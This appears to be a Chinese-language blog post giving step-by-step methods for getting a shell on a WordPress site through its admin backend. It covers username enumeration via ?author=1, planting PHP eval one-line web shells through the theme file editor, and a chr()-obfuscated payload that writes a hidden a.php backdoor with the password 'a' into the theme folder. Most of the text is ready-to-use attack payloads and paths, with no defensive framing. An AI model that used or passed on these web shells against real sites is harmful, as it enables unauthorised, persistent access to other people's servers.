0x00 前言

Wordpress后台Getshell的方法網上公開了很多，在此記錄總結一下

相比於前台，wordpress后台的防御的就低得多
Wordpress的插件和主題功都可以上傳和線編輯
很容易就可以插入木馬getshell

?author=1 遍歷用戶名

0x01 在線編輯getshell

編輯主題

第一種

在后台找到主題外觀編輯
選擇主題，在右側選擇php文件

在PHP標簽內寫入 @eval($_POST[a]);
或者在PHP標簽外寫入 <?php @eval($_POST['code']);?>
提交更改

路徑為
url+/wp-content/themes/+主題名/+修改文件的文件名

連接即可

也可以在這里寫入

url+/wp-content/themes/Begin/inc/xxx.php

第二種

進入主題編輯器，選擇要編輯的主題，要編輯的文件
插入下方payload,然后訪問之
(報下圖錯不用管)
url+/wp-content/themes/編輯的主題/編輯的文件

這樣就在該目錄下生成一句話木馬文件
文件名 a.php 密碼 a
路徑 url+/wp-content/themes/編輯的主題/a.php

<script language="php">fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));</script>